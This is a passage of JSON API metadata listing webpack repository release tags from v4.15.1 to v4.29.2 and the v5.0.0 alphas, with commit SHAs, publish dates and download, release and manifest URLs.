_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpa